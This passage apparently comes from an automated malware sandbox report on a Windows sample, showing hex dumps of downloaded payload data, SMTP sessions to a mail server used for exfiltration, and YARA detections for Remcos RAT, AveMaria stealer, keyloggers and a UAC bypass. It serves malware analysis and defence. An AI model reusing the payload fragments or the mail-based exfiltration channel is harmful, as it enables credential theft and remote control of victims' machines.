7b ee 40 8a 20 90 16 63 62 09 98 ff 50 72 b8 04 f4 ff 66 11 29 40 ff 7d 21 66 01 e6 5f
                                                                                              Data Ascii: |[KfhucP#XfJ/zpBW{d#!e^Pki@NcN>>Lt\(JiJMKf#on?;Z|gKc6<W4G;K^-$=ip/~3>g&Y'Q%s6)4]UY{@ cbPrf)@}!f_
                                                                                              2021-12-07 12:39:07 UTC2203INData Raw: d0 f2 23 39 9b 76 3e 3d 4d 47 18 45 22 ac 9c a7 30 7a f9 0b a8 8f d0 b8 74 09 0c 8d 9f 04 c1 ba 43 f1 ce 6a 46 ed 35 b4 5f 3f 8e 3b 1c d7 16 ab 5e 22 00 ef 5f b6 4f 91 7a e5 0b 1e 02 68 73 70 6f 22 69 57 71 e2 e5 a3 34 d6 61 ae a7 6f a9 d4 f6 0a 11 e2 99 0c b2 8c 40 e7 71 aa 15 f3 40 ba 81 63 5d 46 14 d8 f6 03 f1 55 c1 34 67 b7 f3 a5 12 15 93 2b 83 35 f3 58 ca dc d3 82 d6 67 44 5d b6 e1 8d 9b 08 6b e3 8f ed b4 4c 45 8a 94 9f 20 a3 75 a8 1a e8 7f 3e ab 5d 85 7a 93 b6 43 ca 5d 6a 2e d4 25 be 04 4f 35 d7 83 37 b8 4c c4 3a 7e 06 c5 06 db b7 bd 83 12 29 4a ff 63 9e 55 01 b7 e0 e1 25 ac 6b 13 ef 7c 35 8f a8 bb 06 7b db b1 15 0a 78 ad 9e b9 10 ff 0b 39 80 6d 82 1e ab 34 77 a2 9d 80 95 17 9c cc 31 7c c7 39 0d 42 53 d1 88 52 b1 15 96 45 b3 49 ac 97 1f 8f b9 44 45
                                                                                              Data Ascii: #9v>=MGE"0ztCjF5_?;^"_Ozhspo"iWq4ao@q@c]FU4g+5XgD]kLE u>]zC]j.%O57L:~)JcU%k|5{x9m4w1|9BSREIDE
                                                                                              2021-12-07 12:39:07 UTC2211INData Raw: 45 ea ff a6 3d dd 48 e0 a4 e0 2f e8 2d 98 a0 79 38 d6 5a 1b 88 03 5f 54 86 4a 61 fd 1e b1 fb 7c 9a d2 83 50 19 09 87 7a 1c f8 ff ef 86 68 fe 2e de e0 22 96 3a b5 be 51 4e d0 e4 db 29 a8 d5 4c f8 65 ba e4 8c ea ea 47 94 08 38 b4 6f e4 38 13 93 7b a0 16 a2 99 b1 2c f6 6a c8 d5 1d ad f5 32 89 18 3f b6 8e da e0 f6 dc 28 7e 10 78 e1 03 bb 88 23 46 00 fe cb 2b 5c c2 62 b1 c6 2c d1 19 85 93 a8 5d 51 fb 59 4c ee d3 af 9c f7 96 3b ec 50 5f 87 62 e4 a3 35 07 5f 44 e1 d0 7c 1d be 45 5c 62 80 ca 76 9a e3 67 9e 61 1a 94 8d a5 91 d2 4f c2 fe 87 ff a3 0a de 32 90 f3 66 cb 39 7a d0 f3 19 61 f7 b7 dc 4a e7 fa 3b 27 cb e9 e8 34 d1 4e 78 2b 60 91 00 19 ef 73 45 33 5b 42 96 bb a6 46 36 9d 14 31 ce f5 5d b0 cb 7a 1f ec c4 81 11 b9 9e 56 96 35 ed 47 d3 af 86 0d de f9 d9 e4 4f
                                                                                              Data Ascii: E=H/-y8Z_TJa|Pzh.":QN)LeG8o8{,j2?(~x#F+\b,]QYL;P_b5_D|E\bvgaO2f9zaJ;'4Nx+`sE3[BF61]zV5GO
                                                                                              2021-12-07 12:39:07 UTC2219INData Raw: 0f de bb ab fb 1c ac 58 6e 17 ad c7 c6 4a 2a 77 f8 a9 82 60 d1 9c 0c c9 4f ee 81 fc 47 00 5d 62 54 b5 26 7f 8b 2c f3 3f f5 8f 12 e6 70 04 24 c0 ff 7e ff 62 2c d0 fb df f7 bf 6e 9b bc c9 b7 77 af a5 1e 4d e1 63 9c fe d5 de c1 e3 6b fc af 41 c9 0d 34 f4 db 01 73 5e 0f 81 10 e4 7f 5c 28 da 3e a1 a6 7f 4f a9 4b c5 09 37 d5 65 5b d1 fa ca a9 5c 85 37 50 cd cb 89 50 f9 ea ff dc 00 f8 1f 67 9e 1b 65 2d e8 6b 48 9a 00 fe 37 c5 3c 0a 0f 4c f4 4b d4 c6 35 54 f8 e2 7c a2 98 9f 6c c0 3f bc b6 f6 8e 78 4e 48 6e 7f 98 84 33 1f a8 7d 3f d2 9a 4d b0 91 8a 08 79 36 6d b2 ff 4f ff ff 1f fe 9b 4c 98 80 af 69 73 5e d5 16 3f c5 51 e1 e7 16 52 54 c5 be c2 a0 b1 9a 09 cf da 0c c3 5e 17 a3 a4 68 27 03 d3 52 fb cb 8f d0 7f 5b 5e 42 3c 11 07 b4 01 f9 d5 d4 db cd 7f b1 76 54 01 fe
                                                                                              Data Ascii: XnJ*w`OG]bT&,?p$~b,nwMckA4s^\(>OK7e[\7PPge-kH7<LK5T|l?xNHn3}?My6mOLis^?QRT^h'R[^B<vT
                                                                                              2021-12-07 12:39:07 UTC2227INData Raw: eb f2 57 76 f5 b5 df 37 81 b3 e9 8a 0c 7f a8 fb 32 26 6b 12 19 ce bf 8e 91 41 b4 c6 87 e9 de e6 bf ca e0 b3 34 ba 9d 46 64 e4 84 28 b5 3f d3 40 4c 9d 53 79 ea b4 05 4c 1a ce 62 05 6b 75 4d b2 9d 74 aa b8 70 3a 6a 15 de 97 34 1f 73 72 00 81 1b 4f bb 11 cb 9d 72 50 bc 62 15 4d 4d 75 35 af c8 65 48 89 96 52 b4 62 3d 4e b1 67 26 e5 fc 5b ce d9 11 27 25 69 af ec c5 8b 4e c2 de 35 14 69 d9 be 84 d1 6d 5d 7d 5a 6d ff d8 16 60 d4 e5 d4 d9 6b da 4f 44 22 3c 70 c4 3a 8f d2 8e 15 69 db cf 43 9e d1 89 e0 e8 44 09 b1 12 67 cd 1e 40 0c 72 dd d1 3a c4 18 27 08 62 60 1f 24 c4 b0 26 35 6a c3 8b 32 71 e5 db 4e ca 21 3c 4f c5 36 ee ed 99 83 b1 bf c9 d0 79 73 9c c9 d5 bc dc 29 5a 64 7f d3 44 60 7a b3 38 d5 b5 15 10 03 a4 de 2c 48 2d 96 d1 8a f4 38 45 9e 03 94 f3 fc bd 3d 40
                                                                                              Data Ascii: Wv72&kA4Fd(?@LSyLbkuMtp:j4srOrPbMMu5eHRb=Ng&['%iN5im]}Zm`kOD"<p:iCDg@r:'b`$&5j2qN!<O6ys)ZdD`z8,H-8E=@
                                                                                              2021-12-07 12:39:07 UTC2234INData Raw: e9 4b 97 68 0e 02 79 b3 35 3b ea ba a3 88 3e 4f 4f aa 4b 82 3a f4 64 8f 87 e2 5d ba 44 1b 1f 62 7d e5 9d 9d d0 25 d5 07 19 d6 7d a4 fe 53 77 28 95 4f e3 ea 4e b4 20 3c 38 17 bb 54 be de a0 f2 4d 26 6d 7f d5 2a bd 6d 8a f9 17 7e 95 42 57 eb 56 78 4b e1 f6 0b da 27 3d 76 6c 5f b6 ec 16 07 29 84 84 0f ae 2e 12 16 3b 7a f0 a5 98 b0 ff 19 96 50 d0 81 55 44 72 fd eb 17 cb 1d 5d da 47 1e cb 2e fa 87 49 63 4c cf 52 8a 70 c1 e2 1e f4 9f ce 16 1e ea 8d ac d1 12 89 3b 3c 6a 07 4e 16 ed 71 ff 35 a9 fc 16 72 a8 fb 96 2f a9 fc 21 5a f9 61 8a f0 47 5f 92 3e de 49 cb be f8 48 6c d9 09 fa c0 e1 b8 73 08 86 69 e7 10 38 48 1e e5 f6 f5 d0 c8 33 e3 0e 21 08 0a 27 28 93 d5 f3 c3 a2 90 a8 7e 59 fc 78 18 49 19 76 79 4f ca 0f 78 d2 09 ac 7b bd 27 d7 87 49 d7 ec 4c c4 60 9a 61 5f
                                                                                              Data Ascii: Khy5;>OOK:d]Db}%}Sw(ON <8TM&m*m~BWVxK'=vl_).;zPUDr]G.IcLRp;<jNq5r/!ZaG_>IHlsi8H3!'(~YxIvyOx{'IL`a_
                                                                                              2021-12-07 12:39:07 UTC2242INData Raw: 3c 3b 62 85 f9 bc 30 ed 14 6d 31 aa 52 95 30 06 6c 66 ec b6 aa e9 e7 ea 90 bb d4 1c 1d e1 69 3c a2 09 80 a1 de af 99 f8 91 0f c8 25 74 93 4e 0c ae 66 c0 d9 92 79 17 ef 28 c9 9d 14 8d 71 15 8f a7 13 c7 25 35 e1 29 c0 e3 c8 47 87 d6 0f 4f 54 de 24 9c 94 c7 a1 da f8 38 d4 43 d4 f1 8f 0c ef e1 38 d4 28 80 af da ab e3 7c 6c 77 0c d3 82 a1 3e cf 13 9b c4 c2 b4 bf cb 29 4d 74 86 2a 77 3f 80 d0 03 85 91 b4 4d f7 5c 0f dd 94 50 31 a0 91 81 ce b8 98 65 68 ec 41 9d cf 45 83 07 f5 c1 72 f2 cc 1f e3 1a 37 1e e6 1b 85 0e d9 37 c6 d0 60 22 7c f0 65 3e 40 61 67 e5 36 dd 83 39 77 20 8f 8d 3e ae 02 8b ef 34 bd 5a 2f ed 91 de ca e5 11 22 8a 38 41 44 1d b3 57 2a aa 08 57 1a e7 f8 ce 96 e8 ee 1f 26 f9 ca 99 04 4b df 30 91 3c 43 8c 1a f5 56 ed ab 87 be 96 0d 93 18 d2 d5 5e 64
                                                                                              Data Ascii: <;b0m1R0lfi<%tNfy(q%5)GOT$8C8(|lw>)Mt*w?M\P1ehAEr77`"|e>@ag69w >4Z/"8ADW*W&K0<CV^d
                                                                                              2021-12-07 12:39:07 UTC2250INData Raw: 6f 9f 3c 7f f8 f4 85 5f e5 d4 81 db b2 fc cd b6 45 32 40 d5 1d 34 53 47 91 8a 50 12 94 fb 4d 5a 93 87 a7 53 d7 2f c3 f7 29 28 b9 fb b0 a8 86 7d 95 dd c8 f5 0a 1d 16 55 e9 2b ab 62 5f 75 04 45 57 9f a0 fa d8 57 e5 13 c6 3c d3 8c 75 8c 93 b6 30 ad 88 a1 4e ed 14 82 85 fd 24 47 bc 94 22 d0 26 bb e7 2a 7c 9b 52 fe e4 b8 25 d4 81 b4 a3 fe e6 b7 26 a6 05 83 79 5b bd 94 23 a8 a7 8b c4 94 94 ca 11 81 b3 11 98 87 5a 8d 59 7c b9 08 80 16 62 a4 c2 ec 09 bf 0e e9 ab cd bd 8d 17 24 17 d1 17 ec 9a 77 96 16 ab 1f e5 ea fb 9b 3c 20 2c 9b 65 0d df a4 1a 96 aa ee 2f f5 52 d6 92 d8 93 bf 95 aa 17 6b c1 be 4a 8f 03 db 8f bc f1 58 aa fe 54 88 ac 42 65 fa a6 1a a1 c1 75 fe 13 11 ef 78 f0 83 6f ad b6 dc 54 bb aa af 15 e4 a4 3c 37 e3 26 6f ef fc ea 63 e4 47 66 e1 67 53 82 35 16
                                                                                              Data Ascii: o<_E2@4SGPMZS/)(}U+b_uEWW<u0N$G"&*|R%&y[#ZY|b$w< ,e/RkJXTBeuxoT<7&ocGfgS5
                                                                                              2021-12-07 12:39:07 UTC2258INData Raw: 4d 5c bc aa ab 2f b2 d7 90 cd 3f 7a 03 4d 9c 20 07 a0 ed 04 81 53 95 bd 55 d1 2b 94 e1 57 17 d9 57 dd dd cd 78 bd ea 41 22 6a 2a 3c 9b 05 68 ed 79 9e 00 3c 79 2b 99 26 a6 78 2c 26 02 4b 89 66 66 c3 54 ab 18 7e 0a 9b 89 f4 05 6a 76 70 2f d1 9c c5 67 f1 94 50 36 5a bf 53 0f f7 3f d2 90 e7 4d b5 6f 99 d8 1d ea 67 df 88 5f 2b 05 c0 3c aa fb 11 c8 eb 8e 83 bd e9 a5 dc d4 8d 99 34 4c e1 19 ae f0 ca f4 e5 50 29 5d 74 1a 54 48 a1 bc 26 da 20 9a 80 ae 87 b1 04 f4 54 c3 82 6a d4 ec 59 96 92 b3 67 5c 68 90 ff 93 a3 22 06 a4 bd a8 c5 8a 94 d7 e8 a6 d4 a7 35 f9 52 c5 7c 1a 7c f9 5b 62 e6 b6 4e 0a 88 94 75 2b 53 e9 b3 77 ac a0 09 8f 4c 2e 2a 2b 56 2f a1 f3 85 eb b3 03 8f ad 62 6c 60 ae e2 b8 ff 58 ee 8a 54 73 f0 29 9d 56 d5 f6 bb 51 90 8f d0 06 85 0b 0d 06 29 ef 2c a8
                                                                                              Data Ascii: M\/?zM SU+WWxA"j*<hy<y+&x,&KffT~jvp/gP6ZS?Mog_+<4LP)]tTH& TjYg\h"5R||[bNu+SwL.*+V/bl`XTs)VQ),
                                                                                              2021-12-07 12:39:07 UTC2266INData Raw: 55 98 5e a5 59 62 5a a0 70 6d 68 7d 85 69 1a 6a 1d 7a 98 48 b4 7b 3d e7 bb f8 99 c4 1c 2d d0 08 7a be ea 58 96 37 ab ea d8 45 de 73 ab 8e 65 7b 5f ae 3a 76 ad fd fe ab e8 20 a3 63 ee 15 b6 aa f6 79 55 c7 8c f6 fb c8 71 42 45 6a fb 72 60 c4 a4 8a b4 76 6f 84 ce f6 45 9e f6 7b 8b 58 cb 3c 2e 5f fb 2a f2 3c 8e dc ec ab 7e 4c 5f 4b 36 b4 7f 6e e4 4a a2 2a 08 5e 7e 81 e2 7e 49 f1 a1 e4 dc 95 a7 43 93 7c 51 ef aa f6 ec bc 5a fb c4 90 71 02 e0 82 18 98 89 7c cf 2b d0 f1 79 29 29 eb eb 38 eb 2c fb 2a 2f 3f 5c 64 5f 75 1b b9 ca 70 b3 8f 72 2a 20 e0 7e 0a d9 63 09 75 3a 32 82 44 d7 fd fc ea 3e 05 94 a9 f7 68 c0 fd 3c 3e 51 0d 46 c8 e2 07 52 f1 56 59 fc 8d b2 f0 4f b5 c2 b9 1c 9b 56 8e 99 1f ae 5d 01 e5 15 b7 fd fe 2f 40 f7 25 74 ee 25 33 da 49 ed bd b9 8d 94 17 aa
                                                                                              Data Ascii: U^YbZpmh}ijzH{=-zX7Ese{_:v cyUqBEjr`voE{X<._*<~L_K6nJ*^~~IC|QZq|+y))8,*/?\d_upr* ~cu:2D>h<>QFRVYOV]/@%t%3I
                                                                                              2021-12-07 12:39:07 UTC2273INData Raw: c9 d3 08 99 40 27 60 0e c9 07 98 47 f2 01 2e 21 f9 00 0b 48 3e c0 2d 24 1f 60 21 c9 07 78 98 5c 8f 09 af 94 5c 0f bc 46 ae 07 de 23 d7 93 89 f0 0a ae 07 36 03 36 03 b6 03 76 00 ba 01 95 40 15 d0 01 13 63 10 b0 31 30 82 a4 07 ea 49 7a 60 2a 49 0f 9c 44 d2 03 e7 93 f4 98 28 57 93 f4 c0 4d 24 3d 70 07 49 07 2c 22 e9 80 65 24 1d 26 cc 0a 92 0e 58 45 d2 01 9d cb 11 0f 74 01 3a 60 c2 74 03 36 06 f2 80 4d 80 2a 12 0f 0c 24 f1 ee a8 0f 89 07 ea 49 3c 30 95 84 63 c2 9c 44 c2 81 b3 48 38 70 3e 09 87 82 9b 4f c2 81 eb 49 38 70 1b 09 c7 c3 24 fb 48 38 b0 98 84 03 4b 49 38 26 d4 6b c4 0f bc 47 fc f8 e6 09 f5 2b fc c0 66 40 07 4c a8 ed 88 1f e8 46 10 13 29 8f 60 20 ea 49 10 c7 b2 81 04 31 41 86 03 9d 26 41 4e 81 1d 80 a9 40 32 17 f6 63 e7 70 32 c7 67 22 6c 02 bb 66 92
                                                                                              Data Ascii: @'`G.!H>-$`!x\\F#66v@c10Iz`*ID(WM$=pI,"e$&XEt:`t6M*$I<0cDH8p>OI8p$H8KI8&kG+f@LF)` I1A&AN@2cp2g"lf
                                                                                              2021-12-07 12:39:07 UTC2281INData Raw: ca f2 f0 8a 23 1f ce bf b7 dc 6f ac 22 eb ca a8 e1 f3 0e 2f e9 58 f9 d3 d9 59 db 93 3a be 75 74 68 a9 ce 92 9d 6c e8 39 72 75 eb be 1f fe ba fb 3d c1 97 59 dd 7e bf f0 e1 f7 82 8a 8b c9 ad 26 74 4b 1c 15 e9 d8 7d 7c e2 07 f1 ef af 2a 09 6e fe 76 ae d3 be 01 a7 0a 57 f6 de b4 ae 75 67 bf d4 e8 7b da c3 ea bd 7f 2e fb 66 5e 9f a7 57 2b ce 3f 6b 2b eb 74 f7 87 3d f9 15 a2 14 e9 e6 e3 5f 3b 3d 3c b1 fb ee 1f 2e 3f 69 23 1a 9c ec 90 3c c0 61 e0 e1 2b f2 5f a8 96 dd 4b 8e 79 c6 b5 9f 38 5d e9 11 f1 7b 37 53 c0 87 a5 2b 4f 78 5e 57 e6 7a 6f 1d d4 34 aa 51 97 ac c2 ca 67 df be 33 a7 ff 8e 37 9e 5c 74 1c c8 c9 d8 70 a7 e7 c1 b6 df 6a 0a 9e b4 5a dd d4 a5 e5 c6 5e 89 c5 45 e2 85 8b cf 8a a7 3c 53 8d 18 70 f3 a7 8e 55 a4 fd bc f6 77 1f 5d 74 5b d3 fc 9c 43 c7 cb 91
                                                                                              Data Ascii: #o"/XY:uthl9ru=Y~&tK}|*nvWug{.f^W+?k+t=_;=<.?i#<a+_Ky8]{7S+Ox^Wzo4Qg37\tpjZ^E<SpUw]t[C
                                                                                              2021-12-07 12:39:07 UTC2289INData Raw: 21 74 36 b7 6e 2f c9 4d d8 8d be 0e 57 9a 0d 31 69 78 77 7b 22 eb 47 88 09 ef 31 19 88 3d 89 10 d8 68 87 e1 e1 38 83 d9 16 69 1f ed 9f 89 4b c9 0b ee 41 b4 11 05 da 94 82 ba 97 0e a6 d1 d3 53 12 0d a6 5e dc b4 04 9f 18 62 f3 59 dd 8b be 3b d3 8b db b7 ba 90 be f5 97 a2 ea 5b a3 4e aa be b6 c6 91 6e eb 6b ed 37 78 5e 69 bb 41 e1 4d 32 e8 78 bc 73 bc 89 fc f5 fc 5d fc db 7c 07 81 41 f0 b9 60 87 a0 b7 70 a8 50 2f dc 2f 9c 29 6a 2a fe 50 72 58 d2 58 2a 94 06 e0 53 7e 7c 99 9f 2c 4f b6 5b 76 52 d6 5d 1e 2f ff 97 3c 40 71 43 d1 51 e9 a5 3c a6 1c a4 9a a1 3a a1 52 a8 3f 57 ff ac fe 55 1d a2 59 a0 29 d0 f8 6a d7 6b 99 85 70 07 39 8b e0 45 f0 56 f3 f6 f1 de e2 7b f1 7d 04 ff 12 7c 2b f8 53 c0 15 a6 08 a7 09 3f 12 16 0a 5b 8a ba 89 7c 45 33 44 27 45 bf 89 cc e2 6f
                                                                                              Data Ascii: !t6n/MW1ixw{"G1=h8iKAS^bY;[Nnk7x^iAM2xs]|A`pP//)j*PrXX*S~|,O[vR]/<@qCQ<:R?WUY)jkp9EV{}|+S?[|E3D'Eo


                                                                                              SMTP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IPCommands
                                                                                              Dec 7, 2021 13:40:11.177175999 CET5874976766.29.159.53192.168.2.4220 PrivateEmail.com prod Mail Node
                                                                                              Dec 7, 2021 13:40:11.177797079 CET49767587192.168.2.466.29.159.53EHLO 405464
                                                                                              Dec 7, 2021 13:40:11.343246937 CET5874976766.29.159.53192.168.2.4250-mta-15.privateemail.com
                                                                                              250-PIPELINING
                                                                                              250-SIZE 81788928
                                                                                              250-ETRN
                                                                                              250-AUTH PLAIN LOGIN
                                                                                              250-ENHANCEDSTATUSCODES
                                                                                              250-8BITMIME
                                                                                              250-CHUNKING
                                                                                              250 STARTTLS
                                                                                              Dec 7, 2021 13:40:11.343624115 CET49767587192.168.2.466.29.159.53STARTTLS
                                                                                              Dec 7, 2021 13:40:11.508748055 CET5874976766.29.159.53192.168.2.4220 Ready to start TLS
                                                                                              Dec 7, 2021 13:40:12.552344084 CET5874976866.29.159.53192.168.2.4220 PrivateEmail.com prod Mail Node
                                                                                              Dec 7, 2021 13:40:12.552918911 CET49768587192.168.2.466.29.159.53EHLO 405464
                                                                                              Dec 7, 2021 13:40:12.718250036 CET5874976866.29.159.53192.168.2.4250-mta-15.privateemail.com
                                                                                              250-PIPELINING
                                                                                              250-SIZE 81788928
                                                                                              250-ETRN
                                                                                              250-AUTH PLAIN LOGIN
                                                                                              250-ENHANCEDSTATUSCODES
                                                                                              250-8BITMIME
                                                                                              250-CHUNKING
                                                                                              250 STARTTLS
                                                                                              Dec 7, 2021 13:40:12.718624115 CET49768587192.168.2.466.29.159.53STARTTLS
                                                                                              Dec 7, 2021 13:40:12.883874893 CET5874976866.29.159.53192.168.2.4220 Ready to start TLS
                                                                                              Dec 7, 2021 13:40:15.971216917 CET5874977066.29.159.53192.168.2.4220 PrivateEmail.com prod Mail Node
                                                                                              Dec 7, 2021 13:40:15.971534014 CET49770587192.168.2.466.29.159.53EHLO 405464
                                                                                              Dec 7, 2021 13:40:16.130117893 CET5874977066.29.159.53192.168.2.4250-mta-15.privateemail.com
                                                                                              250-PIPELINING
                                                                                              250-SIZE 81788928
                                                                                              250-ETRN
                                                                                              250-AUTH PLAIN LOGIN
                                                                                              250-ENHANCEDSTATUSCODES
                                                                                              250-8BITMIME
                                                                                              250-CHUNKING
                                                                                              250 STARTTLS
                                                                                              Dec 7, 2021 13:40:16.130337000 CET49770587192.168.2.466.29.159.53STARTTLS
                                                                                              Dec 7, 2021 13:40:16.288464069 CET5874977066.29.159.53192.168.2.4220 Ready to start TLS
                                                                                              Dec 7, 2021 13:40:19.484025002 CET5874977166.29.159.53192.168.2.4220 PrivateEmail.com prod Mail Node
                                                                                              Dec 7, 2021 13:40:19.491142035 CET49771587192.168.2.466.29.159.53EHLO 405464
                                                                                              Dec 7, 2021 13:40:19.649755955 CET5874977166.29.159.53192.168.2.4250-mta-15.privateemail.com
                                                                                              250-PIPELINING
                                                                                              250-SIZE 81788928
                                                                                              250-ETRN
                                                                                              250-AUTH PLAIN LOGIN
                                                                                              250-ENHANCEDSTATUSCODES
                                                                                              250-8BITMIME
                                                                                              250-CHUNKING
                                                                                              250 STARTTLS
                                                                                              Dec 7, 2021 13:40:19.650131941 CET49771587192.168.2.466.29.159.53STARTTLS
                                                                                              Dec 7, 2021 13:40:19.808478117 CET5874977166.29.159.53192.168.2.4220 Ready to start TLS
                                                                                              Dec 7, 2021 13:40:24.818486929 CET5874977466.29.159.53192.168.2.4220 PrivateEmail.com prod Mail Node
                                                                                              Dec 7, 2021 13:40:24.820207119 CET49774587192.168.2.466.29.159.53EHLO 405464
                                                                                              Dec 7, 2021 13:40:24.978636026 CET5874977466.29.159.53192.168.2.4250-mta-15.privateemail.com
                                                                                              250-PIPELINING
                                                                                              250-SIZE 81788928
                                                                                              250-ETRN
                                                                                              250-AUTH PLAIN LOGIN
                                                                                              250-ENHANCEDSTATUSCODES
                                                                                              250-8BITMIME
                                                                                              250-CHUNKING
                                                                                              250 STARTTLS
                                                                                              Dec 7, 2021 13:40:24.978931904 CET49774587192.168.2.466.29.159.53STARTTLS
                                                                                              Dec 7, 2021 13:40:25.136991978 CET5874977466.29.159.53192.168.2.4220 Ready to start TLS
                                                                                              Dec 7, 2021 13:40:30.229645014 CET5874977766.29.159.53192.168.2.4220 PrivateEmail.com prod Mail Node
                                                                                              Dec 7, 2021 13:40:30.229912996 CET49777587192.168.2.466.29.159.53EHLO 405464
                                                                                              Dec 7, 2021 13:40:30.388430119 CET5874977766.29.159.53192.168.2.4250-mta-15.privateemail.com
                                                                                              250-PIPELINING
                                                                                              250-SIZE 81788928
                                                                                              250-ETRN
                                                                                              250-AUTH PLAIN LOGIN
                                                                                              250-ENHANCEDSTATUSCODES
                                                                                              250-8BITMIME
                                                                                              250-CHUNKING
                                                                                              250 STARTTLS
                                                                                              Dec 7, 2021 13:40:30.388719082 CET49777587192.168.2.466.29.159.53STARTTLS
                                                                                              Dec 7, 2021 13:40:30.546871901 CET5874977766.29.159.53192.168.2.4220 Ready to start TLS
                                                                                              Dec 7, 2021 13:40:35.311477900 CET5874977966.29.159.53192.168.2.4220 PrivateEmail.com prod Mail Node
                                                                                              Dec 7, 2021 13:40:35.311795950 CET49779587192.168.2.466.29.159.53EHLO 405464
                                                                                              Dec 7, 2021 13:40:35.470155001 CET5874977966.29.159.53192.168.2.4250-mta-15.privateemail.com
                                                                                              250-PIPELINING
                                                                                              250-SIZE 81788928
                                                                                              250-ETRN
                                                                                              250-AUTH PLAIN LOGIN
                                                                                              250-ENHANCEDSTATUSCODES
                                                                                              250-8BITMIME
                                                                                              250-CHUNKING
                                                                                              250 STARTTLS
                                                                                              Dec 7, 2021 13:40:35.470421076 CET49779587192.168.2.466.29.159.53STARTTLS
                                                                                              Dec 7, 2021 13:40:35.628663063 CET5874977966.29.159.53192.168.2.4220 Ready to start TLS

                                                                                              Code Manipulations

                                                                                              Statistics

                                                                                              CPU Usage

                                                                                              Click to jump to process

                                                                                              Memory Usage

                                                                                              Click to jump to process

                                                                                              High Level Behavior Distribution

                                                                                              Click to dive into process behavior distribution

                                                                                              Behavior

                                                                                              Click to jump to process

                                                                                              System Behavior

                                                                                              Analysis Process: xxTzyGLZx5.exe PID: 6780 Parent PID: 6128

                                                                                              General

                                                                                              Start time:13:38:32
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Users\user\Desktop\xxTzyGLZx5.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\xxTzyGLZx5.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:833414 bytes
                                                                                              MD5 hash:D5F570694F0847CAEA18CCAC8837B052
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, Author: unknown
                                                                                              Reputation:low

                                                                                              Chronological Activities

                                                                                              Analysis Process: xxTzyGLZx5.exe PID: 7008 Parent PID: 6780

                                                                                              General

                                                                                              Start time:13:38:35
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Users\user\Desktop\xxTzyGLZx5.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\xxTzyGLZx5.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:833414 bytes
                                                                                              MD5 hash:D5F570694F0847CAEA18CCAC8837B052
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:Visual Basic
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.675040396.0000000002AD0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000003.675040396.0000000002AD0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000002.00000001.674846942.0000000000403000.00000040.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000001.674846942.0000000000403000.00000040.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000002.00000001.674846942.0000000000403000.00000040.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000001.674846942.0000000000403000.00000040.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000002.00000001.674846942.0000000000403000.00000040.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000001.674846942.0000000000403000.00000040.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000002.00000000.672609321.0000000000403000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000000.672609321.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000002.00000000.672609321.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.672609321.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000002.00000000.672609321.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
